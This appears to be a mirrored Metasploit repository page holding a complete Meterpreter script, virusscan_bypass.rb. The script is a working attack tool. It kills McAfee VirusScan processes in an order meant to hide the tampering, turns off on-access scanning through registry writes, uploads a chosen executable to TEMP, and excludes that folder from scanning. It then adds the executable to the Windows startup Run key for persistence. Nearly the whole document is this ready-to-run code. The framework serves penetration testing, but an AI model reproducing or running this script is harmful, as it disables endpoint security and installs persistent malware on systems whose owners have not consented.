Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

virusscan_bypass.rb 6.1KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
  7. # order which keeps VirusScan icon visible at system tray without disabled sign on it.
  8. # Additionally it lets you disable On Access Scanner from registry, upload your detectable
  9. # binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
  10. # registry key. (Requires administrator privilege. Tested on XP SP3)
  11. #
  12. # Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
  13. #
  14. # Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
  15. session = client
  16. @@exec_opts = Rex::Parser::Arguments.new(
  17. "-h" => [ false,"Help menu." ],
  18. "-k" => [ false,"Only kills VirusScan processes"],
  19. "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
  20. )
  21. ################## function declaration Declarations ##################
  22. def usage()
  23. print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
  24. print_line "----------------------------------------------------------------------------------------------"
  25. print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
  26. print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
  27. print_line "----------------------------------------------------------------------------------------------"
  28. print_line(@@exec_opts.usage)
  29. end
  30. @path = ""
  31. @location = ""
  32. def upload(session,file,trgloc)
  33. if not ::File.exist?(file)
  34. raise "File to Upload does not exists!"
  35. else
  36. @location = session.sys.config.getenv('TEMP')
  37. begin
  38. ext = file.scan(/\S*(.exe)/i)
  39. if ext.join == ".exe"
  40. fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
  41. else
  42. fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
  43. end
  44. @path = fileontrgt
  45. print_status("Uploading #{file}....")
  46. session.fs.file.upload_file("#{fileontrgt}","#{file}")
  47. print_status("Uploaded as #{fileontrgt}")
  48. rescue ::Exception => e
  49. print_status("Error uploading file #{file}: #{e.class} #{e}")
  50. end
  51. end
  52. return fileontrgt
  53. end
  54. #parsing of Options
  55. file = ""
  56. helpcall = 0
  57. killonly = 0
  58. @@exec_opts.parse(args) { |opt, idx, val|
  59. case opt
  60. when "-e"
  61. file = val || ""
  62. when "-h"
  63. helpcall = 1
  64. when "-k"
  65. killonly = 1
  66. end
  67. }
  68. if killonly == 0
  69. if file == ""
  70. usage
  71. raise Rex::Script::Completed
  72. end
  73. end
  74. # Magic kill order :)
  75. avs = %W{
  76. shstat.exe
  77. engineserver.exe
  78. frameworkservice.exe
  79. naprdmgr.exe
  80. mctray.exe
  81. mfeann.exe
  82. vstskmgr.exe
  83. mcshield.exe
  84. }
  85. av = 0
  86. plist = client.sys.process.get_processes()
  87. plist.each do |x|
  88. if (avs.index(x['name'].downcase))
  89. av = av + 1
  90. end
  91. end
  92. if av > 6
  93. print_status("VirusScan Enterprise v8.7.0i+ is running...")
  94. else
  95. print_status("VirusScan Enterprise v8.7.0i+ is not running!")
  96. raise Rex::Script::Completed
  97. end
  98. target_pid = nil
  99. target ||= "mfevtps.exe"
  100. print_status("Migrating to #{target}...")
  101. # Get the target process pid
  102. target_pid = client.sys.process[target]
  103. if not target_pid
  104. print_error("Could not access the target process")
  105. raise Rex::Script::Completed
  106. end
  107. print_status("Migrating into process ID #{target_pid}")
  108. client.core.migrate(target_pid)
  109. target_pid = nil
  110. if killonly == 1
  111. avs.each do |x|
  112. # Get the target process pid
  113. target_pid = client.sys.process[x]
  114. print_status("Killing off #{x}...")
  115. client.sys.process.kill(target_pid)
  116. end
  117. else
  118. avs.each do |x|
  119. # Get the target process pid
  120. target_pid = client.sys.process[x]
  121. print_status("Killing off #{x}...")
  122. client.sys.process.kill(target_pid)
  123. end
  124. # Upload it
  125. exec = upload(session,file,"")
  126. # Initiailze vars
  127. key = nil
  128. value = nil
  129. data = nil
  130. type = nil
  131. # Mcafee registry key
  132. key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
  133. # Split the key into its parts
  134. root_key, base_key = client.sys.registry.splitkey(key)
  135. # Disable when writing to disk option
  136. value = "bScanIncoming"
  137. data = 0
  138. type = "REG_DWORD"
  139. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  140. open_key.set_value(value, client.sys.registry.type2str(type), data)
  141. print_status("Successful set #{key} -> #{value} to #{data}.")
  142. # Disable when reading from disk option
  143. value = "bScanOutgoing"
  144. data = 0
  145. type = "REG_DWORD"
  146. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  147. open_key.set_value(value, client.sys.registry.type2str(type), data)
  148. print_status("Successful set #{key} -> #{value} to #{data}.")
  149. # Disable detection of unwanted programs
  150. value = "ApplyNVP"
  151. data = 0
  152. type = "REG_DWORD"
  153. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  154. open_key.set_value(value, client.sys.registry.type2str(type), data)
  155. print_status("Successful set #{key} -> #{value} to #{data}.")
  156. # Increase the number of excluded items
  157. value = "NumExcludeItems"
  158. data = 1
  159. type = "REG_DWORD"
  160. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  161. open_key.set_value(value, client.sys.registry.type2str(type), data)
  162. print_status("Successful set #{key} -> #{value} to #{data}.")
  163. # Add executable to excluded item folder
  164. value = "ExcludedItem_0"
  165. data = "3|3|" + @location
  166. type = "REG_SZ"
  167. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  168. open_key.set_value(value, client.sys.registry.type2str(type), data)
  169. print_status("Successful set #{key} -> #{value} to #{data}.")
  170. # Set registry to run executable at startup
  171. key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
  172. # Split the key into its parts
  173. root_key, base_key = client.sys.registry.splitkey(key)
  174. value = "MS"
  175. data = @path
  176. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  177. open_key.set_value(value, client.sys.registry.type2str(type), data)
  178. print_status("Successful set #{key} -> #{value} to #{data}.")
  179. end
  180. print_status("Finished!")